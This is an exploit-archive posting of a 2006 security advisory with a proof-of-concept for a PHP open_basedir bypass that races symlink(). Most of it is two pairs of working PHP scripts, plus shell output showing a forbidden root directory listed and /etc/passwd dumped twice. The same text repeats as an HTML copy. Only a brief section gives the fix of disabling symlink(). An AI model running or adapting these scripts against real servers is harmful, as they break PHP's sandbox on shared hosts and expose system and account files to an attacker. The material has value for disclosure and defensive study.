exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

nst-php-openbasedir.txt

nst-php-openbasedir.txt
Posted Oct 9, 2006
Authored by Paisterist | Site neosecurityteam.net

[N]eo [S]ecurity [T]eam [NST] - Advisory #26 - 09/10/06: PHP open_basedir with symlink() function Race Condition PoC exploit

tags | exploit, php
SHA-256 | 3d6c97cd14685b745e27d10b816d854d072ba35a54e70ed6389a075424b9ec70

nst-php-openbasedir.txt

Change Mirror Download
------=_Part_140466_2216477.1160381991193
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

/*
--------------------------------------------------------
[N]eo [S]ecurity [T]eam [NST] - Advisory #26 - 09/10/06
--------------------------------------------------------
Program: PHP
Homepage: http://www.php.net
Vulnerable Versions: PHP 3, 4, 5
Risk: High!
Impact: Critical Risk

-==PHP open_basedir with symlink() function Race Condition PoC exploit==-
---------------------------------------------------------

- Description
---------------------------------------------------------
PHP is a widely-used general-purpose scripting language that is especially
suited for Web development and can be embedded into HTML.

- Tested
---------------------------------------------------------
localhost - PHP 5.0.4

- Vulnerability Description
---------------------------------------------------------

The vulnerability was discovered by the staff of Hardened-PHP (
www.hardened-php.net). You can see the original advisory
in http://www.hardened-php.net/advisory_082006.132.html.

The point isn't all like the Hardened people said:

"The first script alternates a symbolic link between a file that
is allowed and the one that is forbidden by open_basedir and the
second script simply puts loops around operations trying to
operate on the symbolic link."

We don't need to alternate the symlink beetwen an allowed file an a
forbidden one. In this PoC you can see that the symlink
doesn't point to an allowed file in the loop.

script1.php
<?
symlink("a/a/a/a/a/a/", "dummy");
symlink("dummy/../../../../../../", "xxx");
unlink("dummy");
while (1) {
symlink(".", "dummy");
unlink("dummy");
}
?>

script2.php
<?
@print_r(scandir("/")); // open_basedir restriction doesn't let us to see
the root dir content
// scandir() is a PHP 5 function. You can use another function of the other
versions to work on the directory
while (1) {
$dir=@scandir("xxx");
if (@count($dir) > 20) print_r($dir); // the main dir have more than
20 folders
}
?>

--Real Proof of Concept exploit--
[root@fc43035 race_condition]# php script1.php &
[1] 7942
PHP Warning: Module 'gd' already loaded in Unknown on line 0
[root@fc43035 race_condition]# php script2.php
PHP Warning: Module 'gd' already loaded in Unknown on line 0
PHP Warning: file_get_contents(): open_basedir restriction in effect.
File(/etc/passwd) is not within the allowed path(s):
(/var/www/vhosts/:/tmp/) in /var/www/vhosts/foo/race_condition/script2.php
on line 2

Warning: file_get_contents(): open_basedir restriction in effect.
File(/etc/passwd) is not within the allowed path(s):
(/var/www/vhosts/:/tmp/) in /var/www/vhosts/foo/race_condition/script2.php
on line 2
PHP Warning: file_get_contents(/etc/passwd): failed to open stream:
Operation not permitted in /var/www/vhosts/foo/race_condition/script2.php on
line 2

Warning: file_get_contents(/etc/passwd): failed to open stream: Operation
not permitted in /var/www/vhosts/foo/race_condition/script2.php on line 2
PHP Warning: scandir(): open_basedir restriction in effect. File(/) is not
within the allowed path(s): (/var/www/vhosts/:/tmp/) in
/var/www/vhosts/foo/race_condition/script2.php on line 3

Warning: scandir(): open_basedir restriction in effect. File(/) is not
within the allowed path(s): (/var/www/vhosts/:/tmp/) in
/var/www/vhosts/foo/race_condition/script2.php on line 3
PHP Warning: scandir(/): failed to open dir: Operation not permitted in
/var/www/vhosts/foo/race_condition/script2.php on line 3

Warning: scandir(/): failed to open dir: Operation not permitted in
/var/www/vhosts/foo/race_condition/script2.php on line 3
PHP Warning: scandir(): (errno 1): Operation not permitted in
/var/www/vhosts/foo/race_condition/script2.php on line 3

Warning: scandir(): (errno 1): Operation not permitted in
/var/www/vhosts/foo/race_condition/script2.php on line 3
Array
(
[0] => .
[1] => ..
[2] => .autofsck
[3] => .autorelabel
[4] => bin
[5] => boot
[6] => chroot
[7] => dev
[8] => etc
[9] => home
[10] => lib
[11] => lib64
[12] => lost+found
[13] => media
[14] => misc
[15] => mnt
[16] => net
[17] => opt
[18] => proc
[19] => root
[20] => sbin
[21] => selinux
[22] => srv
[23] => sys
[24] => tmp
[25] => usr
[26] => var
)
Array
(
[0] => .
[1] => ..
[2] => .autofsck
[3] => .autorelabel
[4] => bin
[5] => boot
[6] => chroot
[7] => dev
[8] => etc
[9] => home
[10] => lib
[11] => lib64
[12] => lost+found
[13] => media
[14] => misc
[15] => mnt
[16] => net
[17] => opt
[18] => proc
[19] => root
[20] => sbin
[21] => selinux
[22] => srv
[23] => sys
[24] => tmp
[25] => usr
[26] => var
)

[root@fc43035 race_condition]#
--Real Proof of Concept exploit--

We finally bypass the open_basedir restriction and we read the main dir
content. Also we can read a file, like /etc/passwd.

In the third line of script1.php we make the symbolic link to ./etc/passwd
so we have to create a folder named "etc" with a
file named "passwd" inside:

[root@fc43035 race_condition]# ls
a etc script1.php script2.php script.php
[root@fc43035 race_condition]# cd etc
[root@fc43035 etc]# ls
passwd
[root@fc43035 etc]# cd ..
[root@fc43035 race_condition]#

Then the script1.php is equal than the first one. We have just to change the
symbolic link to "dummy/../../../../../../etc/passwd".
In the script2.php we try to read the file ("xxx" link) with the
file_get_contents() function.

script1.php
<?
symlink("a/a/a/a/a/a/", "dummy");
symlink("dummy/../../../../../../etc/passwd", "xxx");
unlink("dummy");
while (1) {
symlink(".", "dummy");
unlink("dummy");
}
?>

script2.php
<?
while (1) {
print @file_get_contents("xxx");
}
?>

--Real Proof of Concept exploit--
[root@fc43035 race_condition]# php script1.php &
[1] 9979
PHP Warning: Module 'gd' already loaded in Unknown on line 0
[root@fc43035 race_condition]# php script2.php
PHP Warning: Module 'gd' already loaded in Unknown on line 0
PHP Warning: file_get_contents(): open_basedir restriction in effect.
File(/etc/passwd) is not within the allowed path(s):
(/var/www/vhosts/:/tmp/) in /var/www/vhosts/foo/race_condition/script2.php
on line 2

Warning: file_get_contents(): open_basedir restriction in effect.
File(/etc/passwd) is not within the allowed path(s):
(/var/www/vhosts/:/tmp/) in /var/www/vhosts/foo/race_condition/script2.php
on line 2
PHP Warning: file_get_contents(/etc/passwd): failed to open stream:
Operation not permitted in /var/www/vhosts/foo/race_condition/script2.php on
line 2

Warning: file_get_contents(/etc/passwd): failed to open stream: Operation
not permitted in /var/www/vhosts/foo/race_condition/script2.php on line 2

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:4294967294:4294967294:Anonymous NFS
User:/var/lib/nfs:/sbin/nologin
apache:x:48:48:Apache:/var/wwww/htdocs:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
amanda:x:33:6:Amanda user:/var/lib/amanda:/bin/bash
postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash
ntp:x:38:38::/etc/ntp:/sbin/nologin
ftp:x:22222:0:root:/root:/bin/false
cyrus:x:76:12:Cyrus IMAP Server:/var/lib/imap:/bin/bash
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:4294967294:4294967294:Anonymous NFS
User:/var/lib/nfs:/sbin/nologin
apache:x:48:48:Apache:/var/wwww/htdocs:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
amanda:x:33:6:Amanda user:/var/lib/amanda:/bin/bash
postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash
ntp:x:38:38::/etc/ntp:/sbin/nologin
ftp:x:22222:0:root:/root:/bin/false
cyrus:x:76:12:Cyrus IMAP Server:/var/lib/imap:/bin/bash

--Real Proof of Concept exploit--

You can see that the /etc/passwd is readed two times and a lot more if we
don't stop the script execution.

- How to fix it? More information?
--------------------------------------------------------
Like the Hardened-PHP staff said, you have to disallow the use of symlink()
function.
You can do this using the disable_functions directive in your php
configuration (php.ini by default):

disable_functions = ...,symlink;

- References
--------------------------------------------------------
http://www.neosecurityteam.net/index.php?action=advisories&id=26
http://www.hardened-php.net/advisory_082006.132.html

- Credits
--------------------------------------------------------
Proof of Concept exploit by Paisterist -> paisterist.nst [at] gmail [dot]
com
Vulnerability discovered by Hardened-PHP staff (http://www.hardened-php.net)

[N]eo [S]ecurity [T]eam [NST] - http://www.neosecurityteam.net/


- Greets
--------------------------------------------------------
HaCkZaTaN
K4P0
Daemon21
Link
0m3gA_x
LINUX
nitrous
m0rpheus
nikyt0x
KingMetal

Argentina, Colombia, Chile, Bolivia, Uruguay EXISTS!!

@@@@'''@@@@'@@@@@@@@@'@@@@@@@@@@@
'@@@@@''@@'@@@''''''''@@''@@@''@@
'@@'@@@@@@''@@@@@@ @@@'''''@@@
'@@'''@@@@'''''''''@@@''''@@@
@@@@''''@@'@@@@@@@@@@''''@@@@@

/* EOF */

------=_Part_140466_2216477.1160381991193
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

/*<br>--------------------------------------------------------<br>[N]eo [S]ecurity [T]eam [NST] - Advisory #26 - 09/10/06<br>--------------------------------------------------------<br>Program: PHP<br>Homepage: <a href="http://www.php.net">
http://www.php.net</a><br>Vulnerable Versions: PHP 3, 4, 5<br>Risk: High!<br>Impact: Critical Risk<br><br>-==PHP open_basedir with symlink() function Race Condition PoC exploit==-<br>---------------------------------------------------------
<br><br>- Description<br>---------------------------------------------------------<br>PHP&nbsp; is a widely-used general-purpose scripting language that is especially suited for Web development and can be embedded into HTML. <br>
<br>- Tested<br>---------------------------------------------------------<br>localhost - PHP 5.0.4<br><br>- Vulnerability Description<br>---------------------------------------------------------<br><br>The vulnerability was discovered by the staff of Hardened-PHP (
<a href="http://www.hardened-php.net">www.hardened-php.net</a>). You can see the original advisory<br>in <a href="http://www.hardened-php.net/advisory_082006.132.html">http://www.hardened-php.net/advisory_082006.132.html</a>
.<br><br>The point isn't all like the Hardened people said:<br><br>"The first script alternates a symbolic link between a file that<br>is allowed and the one that is forbidden by open_basedir and the<br>second script simply puts loops around operations trying to
<br>operate on the symbolic link."<br><br>We don't need to alternate the symlink beetwen an allowed file an a forbidden one. In this PoC you can see that the symlink <br>doesn't point to an allowed file in the loop.<br>
<br>script1.php<br><?<br>&nbsp;&nbsp; symlink("a/a/a/a/a/a/", "dummy");<br>&nbsp;&nbsp; symlink("dummy/../../../../../../", "xxx");<br>&nbsp;&nbsp; unlink("dummy");<br>&nbsp;&nbsp; while (1) {<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; symlink(".", "dummy");
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; unlink("dummy");<br>&nbsp;&nbsp; }<br>?><br><br>script2.php<br><?<br>@print_r(scandir("/")); // open_basedir restriction doesn't let us to see the root dir content<br>// scandir() is a PHP 5 function. You can use another function of the other versions to work on the directory
<br>while (1) {<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $dir=@scandir("xxx");<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; if (@count($dir) > 20) print_r($dir); // the main dir have more than 20 folders<br>}<br>?><br><br>--Real Proof of Concept exploit--<br>[root@fc43035
race_condition]# php script1.php &<br>[1] 7942<br>PHP Warning:&nbsp; Module 'gd' already loaded in Unknown on line 0<br>[root@fc43035 race_condition]# php script2.php<br>PHP Warning:&nbsp; Module 'gd' already loaded in Unknown on line 0
<br>PHP Warning:&nbsp; file_get_contents(): open_basedir restriction in effect. File(/etc/passwd) is not within the allowed path(s): (/var/www/vhosts/:/tmp/) in /var/www/vhosts/foo/race_condition/script2.php on line 2<br><br>Warning: file_get_contents(): open_basedir restriction in effect. File(/etc/passwd) is not within the allowed path(s): (/var/www/vhosts/:/tmp/) in /var/www/vhosts/foo/race_condition/script2.php on line 2
<br>PHP Warning:&nbsp; file_get_contents(/etc/passwd): failed to open stream: Operation not permitted in /var/www/vhosts/foo/race_condition/script2.php on line 2<br><br>Warning: file_get_contents(/etc/passwd): failed to open stream: Operation not permitted in /var/www/vhosts/foo/race_condition/script2.php on line 2
<br>PHP Warning:&nbsp; scandir(): open_basedir restriction in effect. File(/) is not within the allowed path(s): (/var/www/vhosts/:/tmp/) in /var/www/vhosts/foo/race_condition/script2.php on line 3<br><br>Warning: scandir(): open_basedir restriction in effect. File(/) is not within the allowed path(s): (/var/www/vhosts/:/tmp/) in /var/www/vhosts/foo/race_condition/script2.php on line 3
<br>PHP Warning:&nbsp; scandir(/): failed to open dir: Operation not permitted in /var/www/vhosts/foo/race_condition/script2.php on line 3<br><br>Warning: scandir(/): failed to open dir: Operation not permitted in /var/www/vhosts/foo/race_condition/script2.php on line 3
<br>PHP Warning:&nbsp; scandir(): (errno 1): Operation not permitted in /var/www/vhosts/foo/race_condition/script2.php on line 3<br><br>Warning: scandir(): (errno 1): Operation not permitted in /var/www/vhosts/foo/race_condition/script2.php on line 3
<br>Array<br>(<br>&nbsp;&nbsp;&nbsp; [0] => .<br>&nbsp;&nbsp;&nbsp; [1] => ..<br>&nbsp;&nbsp;&nbsp; [2] => .autofsck<br>&nbsp;&nbsp;&nbsp; [3] => .autorelabel<br>&nbsp;&nbsp;&nbsp; [4] => bin<br>&nbsp;&nbsp;&nbsp; [5] => boot<br>&nbsp;&nbsp;&nbsp; [6] => chroot<br>&nbsp;&nbsp;&nbsp; [7] => dev<br>&nbsp;&nbsp;&nbsp; [8] => etc<br>
&nbsp;&nbsp;&nbsp; [9] => home<br>&nbsp;&nbsp;&nbsp; [10] => lib<br>&nbsp;&nbsp;&nbsp; [11] => lib64<br>&nbsp;&nbsp;&nbsp; [12] => lost+found<br>&nbsp;&nbsp;&nbsp; [13] => media<br>&nbsp;&nbsp;&nbsp; [14] => misc<br>&nbsp;&nbsp;&nbsp; [15] => mnt<br>&nbsp;&nbsp;&nbsp; [16] => net<br>&nbsp;&nbsp;&nbsp; [17] => opt<br>&nbsp;&nbsp;&nbsp; [18] => proc
<br>&nbsp;&nbsp;&nbsp; [19] => root<br>&nbsp;&nbsp;&nbsp; [20] => sbin<br>&nbsp;&nbsp;&nbsp; [21] => selinux<br>&nbsp;&nbsp;&nbsp; [22] => srv<br>&nbsp;&nbsp;&nbsp; [23] => sys<br>&nbsp;&nbsp;&nbsp; [24] => tmp<br>&nbsp;&nbsp;&nbsp; [25] => usr<br>&nbsp;&nbsp;&nbsp; [26] => var<br>)<br>Array<br>(<br>&nbsp;&nbsp;&nbsp; [0] => .<br>
&nbsp;&nbsp;&nbsp; [1] => ..<br>&nbsp;&nbsp;&nbsp; [2] => .autofsck<br>&nbsp;&nbsp;&nbsp; [3] => .autorelabel<br>&nbsp;&nbsp;&nbsp; [4] => bin<br>&nbsp;&nbsp;&nbsp; [5] => boot<br>&nbsp;&nbsp;&nbsp; [6] => chroot<br>&nbsp;&nbsp;&nbsp; [7] => dev<br>&nbsp;&nbsp;&nbsp; [8] => etc<br>&nbsp;&nbsp;&nbsp; [9] => home<br>&nbsp;&nbsp;&nbsp; [10] => lib
<br>&nbsp;&nbsp;&nbsp; [11] => lib64<br>&nbsp;&nbsp;&nbsp; [12] => lost+found<br>&nbsp;&nbsp;&nbsp; [13] => media<br>&nbsp;&nbsp;&nbsp; [14] => misc<br>&nbsp;&nbsp;&nbsp; [15] => mnt<br>&nbsp;&nbsp;&nbsp; [16] => net<br>&nbsp;&nbsp;&nbsp; [17] => opt<br>&nbsp;&nbsp;&nbsp; [18] => proc<br>&nbsp;&nbsp;&nbsp; [19] => root<br>&nbsp;&nbsp;&nbsp; [20] => sbin
<br>&nbsp;&nbsp;&nbsp; [21] => selinux<br>&nbsp;&nbsp;&nbsp; [22] => srv<br>&nbsp;&nbsp;&nbsp; [23] => sys<br>&nbsp;&nbsp;&nbsp; [24] => tmp<br>&nbsp;&nbsp;&nbsp; [25] => usr<br>&nbsp;&nbsp;&nbsp; [26] => var<br>)<br><br>[root@fc43035 race_condition]#<br>--Real Proof of Concept exploit--<br><br>
We finally bypass the open_basedir restriction and we read the main dir content. Also we can read a file, like /etc/passwd.<br><br>In the third line of script1.php we make the symbolic link to ./etc/passwd so we have to create a folder named "etc" with a
<br>file named "passwd" inside:<br><br>[root@fc43035 race_condition]# ls<br>a&nbsp; etc&nbsp; script1.php&nbsp; script2.php&nbsp; script.php<br>[root@fc43035 race_condition]# cd etc<br>[root@fc43035 etc]# ls<br>passwd<br>[root@fc43035
etc]# cd ..<br>[root@fc43035 race_condition]#<br><br>Then the script1.php is equal than the first one. We have just to change the symbolic link to "dummy/../../../../../../etc/passwd".<br>In the script2.php we try to read the file ("xxx" link) with the file_get_contents() function.
<br><br>script1.php<br><?<br>&nbsp;&nbsp; symlink("a/a/a/a/a/a/", "dummy");<br>&nbsp;&nbsp; symlink("dummy/../../../../../../etc/passwd", "xxx");<br>&nbsp;&nbsp; unlink("dummy");<br>&nbsp;&nbsp; while (1) {<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; symlink(".", "dummy");<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; unlink("dummy");<br>&nbsp;&nbsp; }<br>?><br><br>script2.php<br><?<br>while (1) {<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; print @file_get_contents("xxx");<br>}<br>?><br><br>
--Real Proof of Concept exploit--<br>[root@fc43035 race_condition]# php script1.php &<br>[1] 9979<br>PHP Warning:&nbsp; Module 'gd' already loaded in Unknown on line 0<br>[root@fc43035 race_condition]# php script2.php<br>PHP Warning:&nbsp; Module 'gd' already loaded in Unknown on line 0
<br>PHP Warning:&nbsp; file_get_contents(): open_basedir restriction in effect. File(/etc/passwd) is not within the allowed path(s): (/var/www/vhosts/:/tmp/) in /var/www/vhosts/foo/race_condition/script2.php on line 2<br><br>Warning: file_get_contents(): open_basedir restriction in effect. File(/etc/passwd) is not within the allowed path(s): (/var/www/vhosts/:/tmp/) in /var/www/vhosts/foo/race_condition/script2.php on line 2
<br>PHP Warning:&nbsp; file_get_contents(/etc/passwd): failed to open stream: Operation not permitted in /var/www/vhosts/foo/race_condition/script2.php on line 2<br><br>Warning: file_get_contents(/etc/passwd): failed to open stream: Operation not permitted in /var/www/vhosts/foo/race_condition/script2.php on line 2
<br><br>root:x:0:0:root:/root:/bin/bash<br>bin:x:1:1:bin:/bin:/sbin/nologin<br>daemon:x:2:2:daemon:/sbin:/sbin/nologin<br>adm:x:3:4:adm:/var/adm:/sbin/nologin<br>lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin<br>sync:x:5:0:sync:/sbin:/bin/sync
<br>shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown<br>halt:x:7:0:halt:/sbin:/sbin/halt<br>mail:x:8:12:mail:/var/spool/mail:/sbin/nologin<br>news:x:9:13:news:/etc/news:<br>uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin<br>operator:x:11:0:operator:/root:/sbin/nologin
<br>games:x:12:100:games:/usr/games:/sbin/nologin<br>gopher:x:13:30:gopher:/var/gopher:/sbin/nologin<br>nobody:x:99:99:Nobody:/:/sbin/nologin<br>dbus:x:81:81:System message bus:/:/sbin/nologin<br>vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
<br>rpm:x:37:37::/var/lib/rpm:/sbin/nologin<br>haldaemon:x:68:68:HAL daemon:/:/sbin/nologin<br>pcap:x:77:77::/var/arpwatch:/sbin/nologin<br>nscd:x:28:28:NSCD Daemon:/:/sbin/nologin<br>named:x:25:25:Named:/var/named:/sbin/nologin
<br>netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash<br>sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin<br>rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin<br>mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
<br>smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin<br>rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin<br>nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin<br>apache:x:48:48:Apache:/var/wwww/htdocs:/sbin/nologin
<br>xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin<br>dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin<br>mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash<br>amanda:x:33:6:Amanda user:/var/lib/amanda:/bin/bash
<br>postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash<br>ntp:x:38:38::/etc/ntp:/sbin/nologin<br>ftp:x:22222:0:root:/root:/bin/false<br>cyrus:x:76:12:Cyrus IMAP Server:/var/lib/imap:/bin/bash<br>root:x:0:0:root:/root:/bin/bash
<br>bin:x:1:1:bin:/bin:/sbin/nologin<br>daemon:x:2:2:daemon:/sbin:/sbin/nologin<br>adm:x:3:4:adm:/var/adm:/sbin/nologin<br>lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin<br>sync:x:5:0:sync:/sbin:/bin/sync<br>shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
<br>halt:x:7:0:halt:/sbin:/sbin/halt<br>mail:x:8:12:mail:/var/spool/mail:/sbin/nologin<br>news:x:9:13:news:/etc/news:<br>uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin<br>operator:x:11:0:operator:/root:/sbin/nologin<br>games:x:12:100:games:/usr/games:/sbin/nologin
<br>gopher:x:13:30:gopher:/var/gopher:/sbin/nologin<br>nobody:x:99:99:Nobody:/:/sbin/nologin<br>dbus:x:81:81:System message bus:/:/sbin/nologin<br>vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin<br>rpm:x:37:37::/var/lib/rpm:/sbin/nologin
<br>haldaemon:x:68:68:HAL daemon:/:/sbin/nologin<br>pcap:x:77:77::/var/arpwatch:/sbin/nologin<br>nscd:x:28:28:NSCD Daemon:/:/sbin/nologin<br>named:x:25:25:Named:/var/named:/sbin/nologin<br>netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash
<br>sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin<br>rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin<br>mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin<br>smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
<br>rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin<br>nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin<br>apache:x:48:48:Apache:/var/wwww/htdocs:/sbin/nologin<br>xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
<br>dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin<br>mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash<br>amanda:x:33:6:Amanda user:/var/lib/amanda:/bin/bash<br>postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash
<br>ntp:x:38:38::/etc/ntp:/sbin/nologin<br>ftp:x:22222:0:root:/root:/bin/false<br>cyrus:x:76:12:Cyrus IMAP Server:/var/lib/imap:/bin/bash<br><br>--Real Proof of Concept exploit--<br><br>You can see that the /etc/passwd is readed two times and a lot more if we don't stop the script execution.
<br><br>- How to fix it? More information?<br>--------------------------------------------------------<br>Like the Hardened-PHP staff said, you have to disallow the use of symlink() function.<br>You can do this using the disable_functions directive in your php configuration (
php.ini by default):<br><br>disable_functions = ...,symlink;<br><br>- References<br>--------------------------------------------------------<br><a href="http://www.neosecurityteam.net/index.php?action=advisories&id=26">
http://www.neosecurityteam.net/index.php?action=advisories&id=26</a><br><a href="http://www.hardened-php.net/advisory_082006.132.html">http://www.hardened-php.net/advisory_082006.132.html</a><br><br>- Credits<br>--------------------------------------------------------
<br>Proof of Concept exploit by Paisterist -> paisterist.nst [at] gmail [dot] com<br>Vulnerability discovered by Hardened-PHP staff (<a href="http://www.hardened-php.net">http://www.hardened-php.net</a>)<br><br>[N]eo [S]ecurity [T]eam [NST] -
<a href="http://www.neosecurityteam.net/">http://www.neosecurityteam.net/</a><br><br><br>- Greets<br>--------------------------------------------------------<br>HaCkZaTaN<br>K4P0<br>Daemon21<br>Link<br>0m3gA_x<br>LINUX<br>
nitrous<br>m0rpheus<br>nikyt0x<br>KingMetal<br><br>Argentina, Colombia, Chile, Bolivia, Uruguay EXISTS!!<br><br>@@@@'''@@@@'@@@@@@@@@'@@@@@@@@@@@<br>'@@@@@''@@'@@@''''''''@@''@@@''@@<br>'@@'@@@@@@''@@@@@@ @@@'''''@@@<br>'@@'''@@@@'''''''''@@@''''@@@
<br>@@@@''''@@'@@@@@@@@@@''''@@@@@<br><br>/* EOF */<br>

------=_Part_140466_2216477.1160381991193--
Login or Register to add favorites

File Archive:

September 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    23 Files
  • 2
    Sep 2nd
    12 Files
  • 3
    Sep 3rd
    0 Files
  • 4
    Sep 4th
    0 Files
  • 5
    Sep 5th
    10 Files
  • 6
    Sep 6th
    8 Files
  • 7
    Sep 7th
    30 Files
  • 8
    Sep 8th
    14 Files
  • 9
    Sep 9th
    26 Files
  • 10
    Sep 10th
    0 Files
  • 11
    Sep 11th
    0 Files
  • 12
    Sep 12th
    5 Files
  • 13
    Sep 13th
    28 Files
  • 14
    Sep 14th
    15 Files
  • 15
    Sep 15th
    17 Files
  • 16
    Sep 16th
    9 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    12 Files
  • 20
    Sep 20th
    15 Files
  • 21
    Sep 21st
    20 Files
  • 22
    Sep 22nd
    13 Files
  • 23
    Sep 23rd
    12 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close